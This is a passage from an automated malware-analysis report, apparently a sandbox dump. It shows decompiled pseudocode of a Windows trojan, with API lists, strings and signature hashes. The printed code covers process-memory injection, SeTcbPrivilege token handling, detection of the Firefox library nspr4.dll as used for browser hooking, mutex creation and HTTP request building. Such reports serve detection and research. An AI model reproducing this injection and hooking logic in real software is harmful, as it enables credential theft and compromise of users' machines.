						_t72 = _v652 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t69 == 1;
						if(_t69 == 1) {
							_v1612 = _v792 >> 0x10;
							_t72 = _v792 & 0x0000ffff;
							L7:
							_v1608 = _t72;
						}
					}
					_v1612 = _v1612 * 0xea60;
					_v1608 = _v1608 * 0xea60;
					E00406F38( &_v1044,  &_v1044, 0, 0x308);
					_v1576 = 0;
					_t80 = E00412FEE();
					__eflags = _t80;
					if(_t80 != 0) {
						do {
							__eflags =  *_t131;
							_v1613 = 1;
							if( *_t131 != 0) {
								L24:
								_t83 = E004168C6();
								_t138 = _t83;
								__eflags = _t83;
								if(__eflags == 0) {
									goto L29;
								} else {
									_v1612 = E0040C9F1(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
									E00406E85(_t138);
									__eflags = _v1616;
									if(_v1616 == 0) {
										_t131 = _a4;
										goto L33;
									} else {
										_v1580 = _v1580 & 0;
										_t108 = E0040E2A5(_t128, _t129,  &_v1580, 1);
										_t131 = _a4;
										__eflags = _t108;
										if(_t108 == 0) {
											L33:
											_t125 = _v1613;
										} else {
											_t131[8] = _t131[8] | 0xffffffff;
											_t110 = E0040EAA2( &_v1600);
											__eflags = _t110;
											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
											E0040CE1E( &(_t131[8]));
											E00406E85(_v1580);
										}
									}
									E00406E85(_v1600);
									__eflags = _t125 - 2;
									if(_t125 != 2) {
										__eflags = _t125;
										if(_t125 != 0) {
											goto L29;
										} else {
											_t84 = _v1612;
										}
									} else {
										_t84 = _v1608;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E0040E164( !( ~(_v1564 & 0x0000ffff)) &  &_v1564, _t128, 0);
								_t123 =  &(_t131[0x122]);
								_t89 = GetFileAttributesW( &_v1568);
								__eflags = _t89 - 0xffffffff;
								if(_t89 == 0xffffffff) {
									_t89 = GetFileAttributesW(0x423348);
									__eflags = _t89 - 0xffffffff;
									if(_t89 == 0xffffffff) {
										goto L29;
									} else {
										_t128 = 0x423348;
										goto L14;
									}
								} else {
									_t128 =  &_v1564;
									L14:
									_t129 = _t123;
									E00407226(_t89 | 0xffffffff, _t128, _t129);
									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
									__eflags = _t140 - 0xffffffff;
									if(_t140 == 0xffffffff) {
										L28:
										E0040C1E0(_t123);
										goto L29;
									} else {
										_v1576 = E0040C1B9(_t128, _t140);
										_t134 = _t129;
										CloseHandle(_t140);
										__eflags = _v1576 - 0xffffffff;
										if(_v1576 != 0xffffffff) {
											L17:
											__eflags = _t134;
											if(__eflags > 0) {
												goto L28;
											} else {
												if(__eflags < 0) {
													L20:
													__eflags = lstrcmpiW(_t123,  &_v1564);
													if(__eflags == 0) {
														goto L24;
													} else {
														_t141 = E00412EC8(_t128, __eflags, 0x8793aef2, 2);
														__eflags = _t141;
														if(_t141 == 0) {
															L29:
															_t131 = _a4;
															_t84 = 0x7530;
														} else {
															_t101 = MoveFileExW(_t123,  &_v1564, 0xb);
															__eflags = _t101;
															if(_t101 == 0) {
																goto L29;
															} else {
																E0040A658(_t141);
																__eflags = _t101 | 0xffffffff;
																_t128 =  &_v1568;
																_t129 = _t123;
																E00407226(_t101 | 0xffffffff,  &_v1568, _t123);
																goto L24;
															}
														}
													}
												} else {
													__eflags = _v1572 - 0xffffffff;
													if(_v1572 > 0xffffffff) {
														goto L28;
													} else {
														goto L20;
													}
												}
											}
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												goto L28;
											} else {
												goto L17;
											}
										}
									}
								}
							}
							_t85 = WaitForSingleObject( *0x423e2c, _t84);
							__eflags = _t85 - 0x102;
						} while (_t85 == 0x102);
					}
					E0040A658(_v1604);
					_t136 = 0;
				} else {
					_t136 = 1;
				}
				E00406E85(_t131);
				return _t136;
			}

0x0040e685
0x0040e694
0x0040e6a8
0x0040e6ad
0x0040e6b3
0x0040e6ce
0x0040e6d9
0x0040e6e4
0x0040e6ec
0x0040e6f4
0x0040e6f8
0x0040e712
0x0040e71a
0x0040e71a
0x0040e71c
0x0040e740
0x0040e740
0x0040e743
0x0040e747
0x00000000
0x0040e71e
0x0040e71e
0x0040e71f
0x0040e72b
0x0040e72f
0x0040e74f
0x0040e74f
0x0040e74f
0x0040e71f
0x0040e75d
0x0040e770
0x0040e77d
0x0040e784
0x0040e789
0x0040e78e
0x0040e790
0x0040e796
0x0040e796
0x0040e799
0x0040e79e
0x0040e89e
0x0040e89e
0x0040e8a3
0x0040e8a5
0x0040e8a7
0x00000000
0x0040e8a9
0x0040e8bc
0x0040e8c0
0x0040e8c5
0x0040e8c9
0x0040e941
0x00000000
0x0040e8cb
0x0040e8cb
0x0040e8d6
0x0040e8db
0x0040e8de
0x0040e8e0
0x0040e944
0x0040e944
0x0040e8e2
0x0040e8e5
0x0040e8ec
0x0040e8f1
0x0040e8f8
0x0040e8fb
0x0040e904
0x0040e904
0x0040e8e0
0x0040e94c
0x0040e951
0x0040e954
0x0040e95c
0x0040e95e
0x00000000
0x0040e960
0x0040e960
0x0040e960
0x0040e956
0x0040e956
0x0040e956
0x0040e954
0x0040e7a4
0x0040e7ab
0x0040e7b7
0x0040e7c7
0x0040e7cd
0x0040e7cf
0x0040e7d2
0x0040e7e0
0x0040e7e2
0x0040e7e5
0x00000000
0x0040e7eb
0x0040e7eb
0x00000000
0x0040e7eb
0x0040e7d4
0x0040e7d4
0x0040e7ed
0x0040e7f0
0x0040e7f2
0x0040e80c
0x0040e80e
0x0040e811
0x0040e90b
0x0040e90c
0x00000000
0x0040e817
0x0040e81e
0x0040e822
0x0040e824
0x0040e82a
0x0040e82f
0x0040e839
0x0040e839
0x0040e83b
0x00000000
0x0040e841
0x0040e841
0x0040e84e
0x0040e85a
0x0040e85c
0x00000000
0x0040e85e
0x0040e86a
0x0040e86c
0x0040e86e
0x0040e911
0x0040e911
0x0040e914
0x0040e874
0x0040e87c
0x0040e882
0x0040e884
0x00000000
0x0040e88a
0x0040e88b
0x0040e890
0x0040e893
0x0040e897
0x0040e899
0x00000000
0x0040e899
0x0040e884
0x0040e86e
0x0040e843
0x0040e843
0x0040e848
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e848
0x0040e841
0x0040e831
0x0040e831
0x0040e833
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e833
0x0040e82f
0x0040e811
0x0040e7d2
0x0040e920
0x0040e926
0x0040e926
0x0040e796
0x0040e935
0x0040e93a
0x0040e6b5
0x0040e6b7
0x0040e6b7
0x0040e6b9
0x0040e6c6

APIs

Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000308,?,?,00000102), ref: 0040E7CD
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0040E806
CloseHandle.KERNEL32(00000000,00000000), ref: 0040E824
lstrcmpiW.KERNEL32(?,?), ref: 0040E854

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Strings

H3B, xrefs: 0040E7DA

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
String ID: H3B
API String ID: 503543330-3983622374
Opcode ID: 5b3f71658fc33d6b80989457b52826eca6cb03b3688a06c70f3c63e55c87139d
Instruction ID: a361a4aef9e74396fdbbde4ac5dd9b8492d2f489b5f79fe3a7d59a6b340616fc
Opcode Fuzzy Hash: 5b3f71658fc33d6b80989457b52826eca6cb03b3688a06c70f3c63e55c87139d
Instruction Fuzzy Hash: D671B0715083419BC320EF36C881A6BB7E8AB85324F140E3EF994B72D1D778D925879A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3DD, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D3DD(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t39;
				void* _t41;
				void* _t44;
				long _t49;
				void* _t50;
				void* _t57;
				void* _t62;
				void* _t69;
				void* _t73;
				WCHAR* _t77;
				void* _t78;
				void* _t80;
				void* _t82;

				_t73 = __edx;
				_t70 = __ecx;
				_t22 = E00412EC8(__ecx, __eflags, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E00412FEE();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E0040A658(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x423e2c, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E00416730(_t70);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t80 = E0040C9F1( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
						_v20 = _t80;
						__eflags = _t80;
						if(__eflags == 0) {
							L21:
							E00406E85(_v20);
							E00406E85(_v24);
							goto L22;
						}
						_t70 = _v16;
						_t33 = E0041CE72(_v16, __eflags, _t80);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E00407D55(_t80, 1);
							_v12 = E00407D55(_t80, 2);
							_t39 = E00408234(_t80, E004079C2(_t80));
							_t72 = _v8;
							_t41 = E00408234(_t72, E004079C2(_v8));
							_t70 = _v12;
							_push(E00408234(_t70, E004079C2(_v12)));
							_push(_t41);
							_push(_t39);
							_push(L"Global\\%08X%08X%08X");
							_t73 = 0x20;
							_t77 =  &_v92;
							_t44 = E00407B78(_t43, _t73, _t77);
							_t82 = _t82 + 0x10;
							__eflags = _t44 - 0x1f;
							if(_t44 != 0x1f) {
								goto L20;
							}
							_t69 = CreateMutexW(0x4239a0, 1, _t77);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L20;
							}
							_t49 = GetLastError();
							__eflags = _t49 - 0xb7;
							if(_t49 == 0xb7) {
								CloseHandle(_t69);
								_t69 = 0;
								__eflags = 0;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								_t50 = 0x10;
								_t78 = E00406E55(_t50);
								__eflags = _t78;
								if(_t78 == 0) {
									L19:
									E0040A658(_t69);
									goto L20;
								}
								 *_t78 = E004072E3(_t51 | 0xffffffff, _t80);
								 *(_t78 + 4) = E004072E3(_t53 | 0xffffffff, _v8);
								_t57 = E004072E3(_t55 | 0xffffffff, _v12);
								__eflags =  *_t78;
								 *(_t78 + 8) = _t57;
								 *(_t78 + 0xc) = _t69;
								if( *_t78 == 0) {
									L18:
									E00406E85( *_t78);
									E00406E85( *(_t78 + 4));
									E00406E85( *(_t78 + 8));
									E00406E85(_t78);
									goto L19;
								}
								__eflags =  *(_t78 + 4);
								if( *(_t78 + 4) == 0) {
									goto L18;
								}
								__eflags = _t57;
								if(_t57 == 0) {
									goto L18;
								}
								_t62 = E004088BA(0x80000, E0041D132, _t78);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t80 = E00407D55(_t80, 3);
							__eflags = _t80;
						} while (_t80 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x423e2c, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x0041d3dd
0x0041d3dd
0x0041d3ea
0x0041d3ef
0x0041d3f4
0x0041d405
0x0041d40b
0x0041d410
0x0041d412
0x0041d5d0
0x0041d5d3
0x0041d5d8
0x00000000
0x0041d5d8
0x0041d423
0x0041d429
0x0041d42e
0x00000000
0x00000000
0x0041d437
0x0041d437
0x0041d43c
0x0041d43f
0x0041d441
0x00000000
0x00000000
0x0041d457
0x0041d459
0x0041d45c
0x0041d45e
0x0041d5a1
0x0041d5a4
0x0041d5ac
0x00000000
0x0041d5ac
0x0041d464
0x0041d468
0x0041d46d
0x0041d46f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d475
0x0041d475
0x0041d47e
0x0041d48c
0x0041d496
0x0041d49b
0x0041d4a7
0x0041d4ac
0x0041d4bd
0x0041d4be
0x0041d4bf
0x0041d4c0
0x0041d4c7
0x0041d4c8
0x0041d4cb
0x0041d4d0
0x0041d4d3
0x0041d4d6
0x00000000
0x00000000
0x0041d4ec
0x0041d4ee
0x0041d4f0
0x00000000
0x00000000
0x0041d4f6
0x0041d4fc
0x0041d501
0x0041d504
0x0041d50a
0x0041d50a
0x0041d50a
0x0041d50c
0x0041d50e
0x0041d512
0x0041d518
0x0041d51a
0x0041d51c
0x0041d588
0x0041d589
0x00000000
0x0041d589
0x0041d52a
0x0041d537
0x0041d53d
0x0041d542
0x0041d545
0x0041d548
0x0041d54b
0x0041d56b
0x0041d56d
0x0041d575
0x0041d57d
0x0041d583
0x00000000
0x0041d583
0x0041d54d
0x0041d551
0x00000000
0x00000000
0x0041d553
0x0041d555
0x00000000
0x00000000
0x0041d562
0x0041d567
0x0041d569
0x00000000
0x00000000
0x00000000
0x0041d569
0x0041d58e
0x0041d597
0x0041d599
0x0041d599
0x00000000
0x0041d5b1
0x0041d5bc
0x0041d5c2
0x0041d5c2
0x00000000
0x0041d5cf
0x00000000

APIs

Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9

GetCurrentThread.KERNEL32 ref: 0041D3FE
SetThreadPriority.KERNEL32(00000000), ref: 0041D405
WaitForSingleObject.KERNEL32(0000EA60), ref: 0041D423
CreateMutexW.KERNEL32(004239A0,00000001,?,20000000), ref: 0041D4E6
GetLastError.KERNEL32 ref: 0041D4F6
CloseHandle.KERNEL32(00000000), ref: 0041D504

Strings

Global\%08X%08X%08X, xrefs: 0041D4C0

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 3448221409-3239447729
Opcode ID: df2755747392a18fd5a753d779dfd56c472087f9862ccf36cbd5bb90f9227ff7
Instruction ID: 7891e28458360a2688fc13f945e8afe01b6e058d4d378cb6e37908dbf5e1b94c
Opcode Fuzzy Hash: df2755747392a18fd5a753d779dfd56c472087f9862ccf36cbd5bb90f9227ff7
Instruction Fuzzy Hash: 5341C2B0E007017BDB117BB1CD46AAF7666AF40318F10063AF815B62D2DF7C9D9086AE

Uniqueness

Uniqueness Score: -1.00%

Function 00415ABB, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00415ABB(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t42;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr* _t55;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				WCHAR* _t66;
				void* _t68;

				_t58 = __ecx;
				_t66 =  &_v112;
				E00405B00(0xdd, _t66);
				_t30 = LoadLibraryW(_t66);
				_v8 = _t30;
				if(_t30 == 0) {
					return _t30;
				}
				_t61 =  &_v84;
				E00405ACA(0xde, _t61);
				_t55 = GetProcAddress(_v8, _t61);
				_t62 =  &_v40;
				E00405ACA(0xdf, _t62);
				_v20 = GetProcAddress(_v8, _t62);
				_t63 =  &_v60;
				E00405ACA(0xe0, _t63);
				_t42 = GetProcAddress(_v8, _t63);
				_t68 = 0;
				_t64 = _t42;
				if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
					L14:
					return FreeLibrary(_v8);
				} else {
					_t44 = E00408551(L"SeTcbPrivilege");
					__imp__WTSGetActiveConsoleSessionId();
					_v24 = _t44;
					if(_t44 != 0xffffffff) {
						E00415A4A(_t58, 0, _t64, _t44, _a4, _a8);
					}
					_push( &_v12);
					_push( &_v16);
					_push(1);
					_push(_t68);
					_push(_t68);
					if( *_t55() == 0) {
						goto L14;
					} else {
						_t57 = 0;
						if(_v12 <= _t68) {
							L13:
							_v20(_v16);
							goto L14;
						} else {
							goto L8;
						}
						do {
							L8:
							_t59 = _t68 + _v16;
							_t50 =  *((intOrPtr*)(_t59 + 8));
							if(_t50 == 0 || _t50 == 4) {
								_t51 =  *_t59;
								if( *_t59 != _v24) {
									E00415A4A(_t59, _t68, _t64, _t51, _a4, _a8);
								}
							}
							_t57 = _t57 + 1;
							_t68 = _t68 + 0xc;
						} while (_t57 < _v12);
						goto L13;
					}
				}
			}

0x00415abb
0x00415ac2
0x00415aca
0x00415ad2
0x00415ad8
0x00415add
0x00415bc0
0x00415bc0
0x00415ae5
0x00415aed
0x00415b00
0x00415b02
0x00415b0a
0x00415b17
0x00415b1a
0x00415b22
0x00415b2d
0x00415b2f
0x00415b31
0x00415b35
0x00415bb3
0x00000000
0x00415b40
0x00415b45
0x00415b4a
0x00415b50
0x00415b56
0x00415b60
0x00415b60
0x00415b68
0x00415b6c
0x00415b6d
0x00415b6f
0x00415b70
0x00415b75
0x00000000
0x00415b77
0x00415b77
0x00415b7c
0x00415bad
0x00415bb0
0x00000000
0x00000000
0x00000000
0x00000000
0x00415b7e
0x00415b7e
0x00415b81
0x00415b84
0x00415b89
0x00415b90
0x00415b95
0x00415b9f
0x00415b9f
0x00415b95
0x00415ba4
0x00415ba5
0x00415ba8
0x00000000
0x00415b7e
0x00415b75

APIs

LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00416451,?,?), ref: 00415AD2
GetProcAddress.KERNEL32(?,?), ref: 00415AFE
GetProcAddress.KERNEL32(?,?), ref: 00415B15
GetProcAddress.KERNEL32(?,?), ref: 00415B2D
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00416451,?,?,00000000), ref: 00415BB6

Part of subcall function 00408551: GetCurrentThread.KERNEL32 ref: 00408561
Part of subcall function 00408551: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 00408568
Part of subcall function 00408551: OpenProcessToken.ADVAPI32(000000FF,00000020,J[A,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 0040857A

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,00416451,?,?,00000000), ref: 00415B4A

Part of subcall function 00415A4A: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,00415BA4,00000000,?,?,?), ref: 00415A6F
Part of subcall function 00415A4A: CloseHandle.KERNEL32(?,?,00000000,?,00415BA4,00000000,?,?,?), ref: 00415AB0

Strings

SeTcbPrivilege, xrefs: 00415B40
.exe, xrefs: 00415AE4

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$SeTcbPrivilege
API String ID: 1107370034-552748125
Opcode ID: 41df2f19b03972d1932bde7e6e015b41570e1fa0dd650c3e7feb960aac92c30b
Instruction ID: 2ad6ccc125f3d13c226d6d86fc236b62286bf1622260f7b1dd5ebcbad7026212
Opcode Fuzzy Hash: 41df2f19b03972d1932bde7e6e015b41570e1fa0dd650c3e7feb960aac92c30b
Instruction Fuzzy Hash: D9315835A00618EFCF11ABE5CD849EFBB79EF84304F144566F801F6250C678AE819AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041295C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041295C(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x4223b8);
				 *0x4223ac = 0;
				 *0x4223b4 = 0;
				 *0x4223b0 = 0;
				 *0x4223a8 = 0;
				 *0x424000 = 0;
				 *0x423ff8 = 0;
				 *0x423ffc = 0;
				InitializeCriticalSection(0x423fe0);
				_t42 =  &_v532;
				E004131E9(_t39, _t42, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E0041BFDD( &_v532);
				E0041475F( &_v532);
				 *0x423f5c = 0;
				 *0x423fdc = 0;
				InitializeCriticalSection(0x423fc4);
				E0040D9C1(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E00404F4F(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x423774 =  *0x423774 | 0x00000001;
				}
				E00404D18();
				return 1;
			}

0x0041295c
0x0041295c
0x00412973
0x0041297e
0x00412984
0x0041298a
0x00412990
0x00412996
0x0041299c
0x004129a2
0x004129a8
0x004129ab
0x004129b1
0x004129b6
0x004129c9
0x004129d6
0x004129db
0x004129f5
0x004129fa
0x004129fa
0x004129fe
0x004129fe
0x00412a04
0x00412a0a
0x00412a10
0x00412a10
0x00412a16
0x00412a24
0x00412a2f
0x00412a39
0x00412a3f
0x00412a45
0x00412a47
0x00412a59
0x00412a64
0x00412a5b
0x00412a5d
0x00412a5d
0x00412a68
0x00412a6a
0x00412a6a
0x00412a71
0x00412a7c

APIs

InitializeCriticalSection.KERNEL32(004223B8,00000000,74B04EE0,00000000), ref: 00412973
InitializeCriticalSection.KERNEL32(00423FE0), ref: 004129A8

Part of subcall function 004131E9: PathRenameExtensionW.SHLWAPI(?,.dat,?,004239C8,00000000,00000032,?,77E49EB0,00000000), ref: 00413262

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004129D0
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 004129ED
CloseHandle.KERNEL32(00000000), ref: 004129FE
InitializeCriticalSection.KERNEL32(00423FC4), ref: 00412A45
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00412A51

Strings

nspr4.dll, xrefs: 00412A4C

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: nspr4.dll
API String ID: 1155594396-741017701
Opcode ID: 9d41ba7e63571c8dcfb6563cc241efb5eb3ff5d57f5484d75c1f37e937bff888
Instruction ID: 97f8fcc1ee728c5dac7df4b46860eacb7370b703142412b0d1f081894f045f7a
Opcode Fuzzy Hash: 9d41ba7e63571c8dcfb6563cc241efb5eb3ff5d57f5484d75c1f37e937bff888
Instruction Fuzzy Hash: A9318470A40208AAC720DF79AE85ADA77B8FF44354F50057FF515E32E0D7B84A828B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00412F03, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 87
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412F03(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				void _t26;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t26 = E0040B7DE( *0x42397c, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_a8 = _a8 |  *0x423968 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x423968 -  *0x42397c + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x42397c -  *0x42397c + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E004126D9(0x423e2c, _t51, _v12,  *0x423e2c) == 0) {
						_v5 = _v5 + 1;
					}
					if(E004126D9(0x423e30, _t51, _v12,  *0x423e30) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x00412f03
0x00412f03
0x00412f0f
0x00412f16
0x00412f1b
0x00412f30
0x00412f3d
0x00412f3f
0x00412f3f
0x00412f4b
0x00412f4e
0x00412f70
0x00412f72
0x00412f72
0x00412f91
0x00412f93
0x00412f93
0x00412fac
0x00412fae
0x00412fae
0x00412fc7
0x00412fc9
0x00412fc9
0x00412fcf
0x00412fe6
0x00412fd1
0x00412fdb
0x00000000
0x00412fdb
0x00412f1d
0x00412f1d
0x00412f1d
0x00412f1d
0x00412feb

APIs

Part of subcall function 0040B7DE: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 0040B7FA

DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,00405F2E,?,00000000,?), ref: 00412F35
WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,00405F2E,?,00000000,?,?,004060BC,?), ref: 00412F6C
WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,00405F2E,?,00000000,?,?,004060BC,?,?), ref: 00412F8C
VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,00405F2E,?,00000000,?,?,004060BC), ref: 00412FDB

Strings

h9B, xrefs: 00412F56
|9B, xrefs: 00412F76
0>B, xrefs: 00412FB7
,>B, xrefs: 00412F9C

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID: ,>B$0>B$h9B$|9B
API String ID: 2215616122-850568417
Opcode ID: b71ec7abf7b12941cd4bc090b40fff6d20e6c5d36b442db797c3723993204852
Instruction ID: cbe87a814bb7ee593a4eecd643eb3e198966d32338d260eb30c917bbb008ebc6
Opcode Fuzzy Hash: b71ec7abf7b12941cd4bc090b40fff6d20e6c5d36b442db797c3723993204852
Instruction Fuzzy Hash: 7821B6B1604149BBDB019FA4DD41EFE7F78EB19304F404095F601E6150D3B99A97DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00408B6D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408B6D(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x422000, _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
